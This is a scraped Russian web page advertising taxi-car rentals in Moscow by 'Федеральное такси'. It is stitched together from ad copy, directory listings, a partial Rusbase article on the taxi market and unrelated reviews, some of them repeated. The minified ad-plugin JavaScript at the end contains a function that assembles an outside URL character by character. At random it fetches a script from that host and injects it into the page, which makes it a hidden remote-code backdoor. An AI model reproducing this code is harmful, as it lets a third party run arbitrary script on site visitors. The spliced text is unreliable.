Такси федеральное

Аренда авто под такси в Москве

Самый быстрый способ взять в аренду машину такси

Выдача авто
день в день

Корона и максимальный приоритет в Яндекс.Такси

Преимущества аренды авто у нас

Внутренняя система обучения, своя служба эвакуаторов, для постоянных водителей очень интересные акции и спецпредложения!

Подключение к заказам
в день оформления

В Яндекс.Такси
есть Корона

Автомобили в
максимальных комплектациях

Водители зарабатывают от
3000₽ чистыми в день

Подключение к
заказам без %

ОСАГО, плановое ТО, сезонная
резина за счет парка

Наш автопарк

Мы работаем с 4 основными надёжными моделями автомобилей от эконом до комфорт+ класса. Такой подход даёт нам возможность гарантировать быстрое обслуживание автопарка, ТО, а также оперативное наличие запчастей и расходников.

Аренда Kia Rio МКПП и АКПП

Класс автомобиля: эконом

Аренда Hyundai Solaris МКПП и АКПП

Класс автомобиля: эконом

Аренда Skoda Oktavia АКПП

Класс автомобиля: комфорт

Аренда Kia Optima АКПП

Класс автомобиля: комфорт+

Отзывы наших водителей

Мы создаём отличные условия для работы водителей, благодаря этому среднее время работы водителей с нами составляет более полутора лет!

Вячеслав

Уже полтора года работаю с компанией «Федеральное такси». Работой полностью доволен. Компания берет на себя все вопросы, связанные с облслуживанием машины, техосмотрами и прочим. Мне достаточно просто включить телефон и начать зарабатывать деньги!

Тимур

Пришел в компанию по рекомендации друга. Сказал, что смогу в первый же день выехать в город и начать получать заказы. Скептически отнесся к этому, но в автопарк приехал, и был удивлен! Я реально получил машину день в день, корону в Яндексе и получил в этот же день первые заказы!

Олег

Работаю с компанией уже 3 месяца. С компанией «Федеральное такси» полностью отпало желание покупать свою машину для работы. Автопарк в прекрасном состоянии, машины новые, представители компании помогают решить любой вопрос и максимально лобируют интересы таксистов в компаниях такси!

Подключаем к заказам

Мы поможем вам выполнить все настройки на телефоне, установить приложения такси и как можно быстрее получить первые заказы.

Как нас найти

Наши автопарки располагаются в северной и южной частях Москвы, что позволяет вам оперативно добраться до наших офисов из любой части города.

Долгопрудный, ул. Жуковского, дом 3

Каширское шоссе, дом 14, ТРЦ Гудзон

Аренда машины такси в Москве

У нас вы можете взять в аренду автомобиль для такси день в день и стоимостью всего от 1100 рублей в сутки.

Аренда машины такси — это отличная возможность начать свой собственный бизнес. Для старта вам необходимо иметь опыт вождения от 3 лет. Это всё, что нужно, чтобы прямо здесь и сейчас взять машину хорошего уровня и начать зарабатывать в службе такси.

Аренда авто для такси в Москве недорого

Возможно, вы могли подумать, что арендовать машину для такси очень дорого, и проще купить свою машину и начать работать на ней. Однако, это совсем не так. В нашем таксопарке очень демократичное ценообразование, и вы можете взять машину в аредну начиная от 1100 рублей в пересчёте на одни сутки.

Где можно взять в аренду авто под такси в Москве

Самый быстрый способ взять в аренду машину такси

Выдача авто
день в день

Корона и максимальный приоритет в Яндекс.Такси

Аренда авто в округах Москвы

Благодаря удобному расположению нашей сети филиалов, вы можете взять в аренду автомобиль неподалеку от вашего местоположения.

Аренда авто в районах Москвы

Благодаря удобному расположению нашей сети филиалов, вы можете взять в аренду автомобиль неподалеку от района, в котором вы проживаете.

Аренда авто рядом с метро Москвы

Благодаря удобному расположению нашей сети филиалов, вы можете взять в аренду автомобиль неподалеку от вашей станции метро в Москве.

Аренда авто рядом с МЦК Москвы

Благодаря удобному расположению нашей сети филиалов, вы можете взять в аренду автомобиль неподалеку от удобной для вас станции МЦК.

Аренда авто в Московской области

Благодаря удобному расположению нашей сети филиалов, вы можете взять в аренду автомобиль неподалеку от вашего города проживания в Московской области.

Преимущества аренды авто у нас

Внутренняя система обучения, своя служба эвакуаторов, для постоянных водителей очень интересные акции и спецпредложения!

Подключение к заказам
в день оформления

В Яндекс.Такси
есть Корона

Автомобили в
максимальных комплектациях

Водители зарабатывают от
3000₽ чистыми в день

Подключение к
заказам без %

ОСАГО, плановое ТО, сезонная
резина за счет парка

Наш автопарк

Мы работаем с 4 основными надёжными моделями автомобилей от эконом до комфорт+ класса. Такой подход даёт нам возможность гарантировать быстрое обслуживание автопарка, ТО, а также оперативное наличие запчастей и расходников.

Аренда Kia Rio МКПП и АКПП

Класс автомобиля: эконом

Аренда Hyundai Solaris МКПП и АКПП

Класс автомобиля: эконом

Аренда Skoda Oktavia АКПП

Класс автомобиля: комфорт

Аренда Kia Optima АКПП

Класс автомобиля: комфорт+

Отзывы наших водителей

Мы создаём отличные условия для работы водителей, благодаря этому среднее время работы водителей с нами составляет более полутора лет!

Вячеслав

Уже полтора года работаю с компанией «Федеральное такси». Работой полностью доволен. Компания берет на себя все вопросы, связанные с облслуживанием машины, техосмотрами и прочим. Мне достаточно просто включить телефон и начать зарабатывать деньги!

Тимур

Пришел в компанию по рекомендации друга. Сказал, что смогу в первый же день выехать в город и начать получать заказы. Скептически отнесся к этому, но в автопарк приехал, и был удивлен! Я реально получил машину день в день, корону в Яндексе и получил в этот же день первые заказы!

Олег

Работаю с компанией уже 3 месяца. С компанией «Федеральное такси» полностью отпало желание покупать свою машину для работы. Автопарк в прекрасном состоянии, машины новые, представители компании помогают решить любой вопрос и максимально лобируют интересы таксистов в компаниях такси!

Подключаем к заказам

Мы поможем вам выполнить все настройки на телефоне, установить приложения такси и как можно быстрее получить первые заказы.

Как нас найти

Наши автопарки располагаются в северной и южной частях Москвы, что позволяет вам оперативно добраться до наших офисов из любой части города.

Федеральное Такси

Могли бы вы порекомендовать услуги Федеральное Такси своим друзьям?

Спасибо за вашу оценку! Другие пользователи будут вам очень благодарны!

Если вам есть что рассказать о компании Федеральное Такси, пожалуйста, оставьте ваш отзыв.

  • Владельцам:
  • Звезды на сайт
  • Посещаемость
  • Скрыть рекламу
  • Поднять компанию
  • В Gold-раздел
  • Рекламируйтесь
  • на редактирование Федеральное Такси»>Получить права на редактирование
  • Создайте сайт

ООО «ФЕДЕРАЛЬНОЕ ТАКСИ»

Аренда авто под такси МКПП или АКПП от 1100 рублей в сутки с подключением!

ООО «Федеральное Такси» приглашает водителей арендовать автомобиль для работы в такси.

Наш парк работает с 2013 года и составляет уже 2000+ автомобилей. Автопарк постоянно обновляется, каждое авто проходит регулярное ТО!

Аренда авто под такси МКПП или АКПП от 1100 рублей в сутки с подключением!

ООО «Федеральное Такси» приглашает водителей арендовать автомобиль для работы в такси.

Наш парк работает с 2013 года и составляет уже 2000+ автомобилей. Автопарк постоянно обновляется, каждое авто проходит регулярное ТО!

— Kia Rio (Киа Рио), Hyundai Solaris (Хюндай Солярис), Kia Optima (Киа Оптима) и Shkoda Oktavia (Шкода Октавия) на автомате (АКПП)
— Новые автомобили без пробега (2018-2019)
— Желтые номера для езде по автобусным полосам
— Желтый цвет кузова и лицензия
— Машина домашняя, без ограничений по пробегу!
— Сервис и ТО за счет автопарка

Только сейчас действует акция — ПЕРВЫЙ ДЕНЬ БЕСПЛАТНО!

Бесплатное подключение к заказам ЯНДЕКС (с короной в приложении), СИТИ, ГЕТТ в день обращения!

Требования к водителю:

— Минимальный стаж по правам 3 года
— Паспорт любой
— Права РФ, Кыргызстан, Беларусь

— Сутки от 1100 рублей
— Неделя от 9000 рублей
— 10 дней от 12000 рублей
— Месяц от 33000 рублей

Первоначальный залог от 5000 рублей.

Минимальный срок аренды — от 3 дней.

Звоните или пишите, будем рады ответить на ваши вопросы и ждем у нас в парке!

Отзывы о компании

К сожалению, еще никто не оставлял комментарии на этой странице.

Кто рулит на российском рынке такси

экс-редактор раздела «Технологии» на Rusbase

Отечественный рынок такси всегда был сложным и закрытым. Эксперты крайне неохотно соглашаются давать ему оценку и говорить о распределении долей между игроками. Rusbase попытался выяснить, как устроен этот рынок, куда он движется и кто командует парадом.

Всего за несколько лет мобильные технологии произвели революцию в нише такси, обострив конкуренцию до предела. Это изрядно облегчило жизнь пассажирам: время подачи машины сократилось в несколько раз, поездки стали куда дешевле.

Ноябрьский опрос ВЦИОМа показал, что жители крупных городов стали вдвое чаще ездить на такси — они довольны ценой и качеством услуги (быстрота подачи, вежливость водителей, возможность оплаты картой). По данным аналитиков, за три года приложения для заказа такси сократили долю «бомбил» на рынке с 80% до 30%. Кроме того, рост популярности такси снижает нагрузку на городскую инфраструктуру и улучшает экологию. Словом, мобилизация рынка такси принесла выгоду городу, пользователям, посредникам — всем, кроме самих водителей, которым из-за демпинга приходится работать больше за меньшие деньги.

Объем рынка такси

Демократизация цен на такси привела к росту рынка, который к 2015 году составил $9 млрд (это ноябрьская оценка аналитической компании Merku). Член правления Ассоциации диспетчерских служб такси Оксана Серебрякова с этой цифрой не согласна. По ее расчетам, объем рынка составляет не более $6 млрд, или около 420 млрд в рублях. Из-за кризиса количество заказов упало у разных перевозчиков на 40-50%, убеждена Серебрякова, и в этом году точно не будет расти.

«Объем рынка очень сложно исчислить, — признает основатель компании «Таксилёт» Михаил Виноградов. — Мы в своих расчетах ориентируемся на 1 поездку в сутки на 10 жителей городов-миллионников. То есть в Москве можно говорить примерно о миллионе перемещений в сутки».

Никто из игроков не хочет делиться данными о своих объемах. Рынок по большей части состоит из нелегализованных и никак не фиксируемых перевозок и участников. Из своего опыта работы в регионах мы вывели формулу: обычно суточный объем перевозок составляет 10% от населения города. Средний чек зависит уровня жизни и присутствия в городе сетевика (крупной сети диспетчерских — ред.). В миллионниках это 100-150 рублей, в городках — 60-80 рублей. Поэтому берем 15 млн поездок по стране в сутки, умножаем их на 100 рублей среднего чека и получаем 1,5 млрд рублей оборота в сутки. Примерно 20% этой суммы получают диспетчерские, примерно 1% — поставщики софта для такси. Это очень грубые цифры, но они могут служить опорой для понимания рынка, который невозможно точно оценить.

Основатель такси-сервиса Gett Шахар Вайсер прогнозировал, что в ближайшие 3-4 года российский рынок такси вырастет до $15-20 млрд, причем произойдет это за счет онлайн-сервисов. Другой участник рынка убежден, что эта цифра не отражает нынешних реалий и была озвучена Gett специально для инвесторов, чтобы показать потенциал и привлечь очередной раунд.

А руководитель Cat Taxi Геннадий Котов считает некорректным оценивать российский рынок такси в долларах из-за колебаний курса и того, что стоимость перевозок абсолютно не привязана к валюте. При этом он отмечает, что для Gett и Uber падение рубля крайне выгодно: внешние инвестиции дают им дополнительные возможности для демпинга в России.

Количество таксистов

В октябре 2015 года в России официально работало более 180 тысяч машин такси (собеседники Rusbase предполагают, что эта цифра охватывает только легальных водителей). В одной только Москве, по данным городского департамента транспорта, лицензировано около 55 тысяч водителей такси. Причем многие водители сотрудничают сразу с несколькими сервисами.

По оценке основателя «Таксилёта» Михаила Виноградова, в столице работает еще около 100 тысяч такси без лицензий, работающих по договорам фрахтования

ООО ФЕДЕРАЛЬНОЕ ТАКСИ

Если Вы являетесь представителем данной организации, то можете разместить дополнительную информацию:
  • О компании (до 1000 символов)
  • Описание товаров и услуг (до 1000 символов)
  • Телефоны
  • Электронная почта
  • Фактический/Почтовый адрес
  • Сайт (активная ссылка)
  • Банковские реквизиты
  • Ключевые клиенты/партнёры (до 100 символов)
  • Логотип компании

Данные появятся в течение 2 рабочих дней после модерации.

Услуга предоставляется
бесплатно

Основной вид деятельности
Дополнительные виды деятельности
Нет зарегистрированных существенных фактов

Если Вы работали или были на собеседовании в ОБЩЕСТВО С ОГРАНИЧЕННОЙ ОТВЕТСТВЕННОСТЬЮ «ФЕДЕРАЛЬНОЕ ТАКСИ»

оставьте свой отзыв на сайте «Сотрудник» — Портал отзывов сотрудников и соискателей о работадателях (sotrydnik.com)

Написать отзыв Читать отзывы сотрудников и соискателей

Добавить отзыв

Все построено так, чтобы взять с водителя денег больше: «потеря» данных о сумме депозита, несуществующие штрафы задним числом, отъём процентов за любую финансовую операцию, причем даже если списывают безнал с таксометра, например, за аренду, тоже стригут процент. Все штрафы проводят через контору, не забывая взять с вас процент за услугу. Рассчитаться, т.е получить депозит — это отдельная история, когда тебя кормят завтраками месяц, с суммы удерживают процент за обналичку. Короче, вам здесь не рады если вам нужны деньги. Хотя всегда готовы дать авто, практически каждому желающему.

Могу сообщить следующую информацию о компании:

Заказывал Samsung Galaxy A3 2017 года. Заказ №26423 от 06.08.2019 года.О том, что телефон «восстановленный» узнал только по приезду курьера, когда он подсовывал мне бумагу о получении. Причём надпись очень хитрая. В товарном чеке (никаких кассовых чеков не дают — левак полный) название «Samsung Galaxy A3 2017 RFB», а уже после итоговой стоимости мелким шрифтом подписано, что RFB означает «я понимаю, что телефон восстановленный, перепрошитый и т. д.» Надпись заметил уже после ухода курьера, сам виноват, читайте внимательно всё, что подписываете.История на этом не закончилась. Телефон в принципе работает, звонит и основные функции выполняет. Но при тестировании нашёл недостатки: не работает функция NFC (хотя заявлена на сайте) и не до конца вставляется разъём гарнитуры (из-за этого не работает микрофон гарнитуры). Обратился в их «сервис». Через два дня мне выдали «заключение» о полной исправности телефона. Подозреваю, что они его даже не проверяли. Видимо, у магазина схема такая: человек покупает телефон, если телефон работает-ему повезло, если телефон не работает — никогда не признавать неисправность и возврат денег он никогда не получит.Покупал в этом магазине только потому, что нужного телефона нет в официальной продаже. Надеялся на то, что остатки официальных телефонов распродают. Оказалось, зря надеялся.Официального адреса магазина нет, поэтому предъявлять претензии можно только по телефону. Соответственно, при определении того, что звонят по гарантии, операторы сливаются и отправляют в сервисный центр, который строчит стандартные отписки о «полной исправности» телефонов.Выводы делайте сами.

Могу сообщить следующую информацию о компании:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}